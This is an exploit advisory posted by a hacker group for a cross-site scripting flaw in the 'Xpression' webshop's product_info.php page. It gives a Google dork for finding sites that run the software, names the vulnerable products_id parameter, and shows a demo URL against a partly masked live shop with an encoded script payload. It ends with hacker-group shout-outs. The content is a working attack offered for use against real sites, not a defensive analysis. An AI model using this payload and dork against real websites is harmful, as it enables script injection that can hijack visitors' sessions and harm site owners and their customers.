################################################ # Exploit Title : Xpression Cross Site Scripting # # Exploit Author : Ashiyane Digital Security Team # # Security Risk : Medium - Cross Site Scripting # # Vendor Page : www.www.xpression.com # # Goolge Dork : "Powered by Xpression" &"product_info.php" # ################################################# # vul location: Http://site/product_info.php?products_id=[XSS] # # DEMO: # ------------------------------------------------------------------------------------ # | http://www.noXXXlia.nl/webshop//product_info.php?products_id=363%22/%3E%3CScript%3Ealert%28/%20XsseD%20bY%20T3rm!nat0r5/%29%3C/script%3E | # # ------------------------------------------------------------------------------------ # Spacial TnX : C4T , TrojanMan , Amirh03in , # Alireza666 , milvar , Remove , B4b4K KH4TaR , # PrinceofHacking , sil3nt ,YoSeF-HaCkeR... ################################################# # Greetz to: My Lord ALLAH ################################################# # # bY T3rm!nat0r5 # #################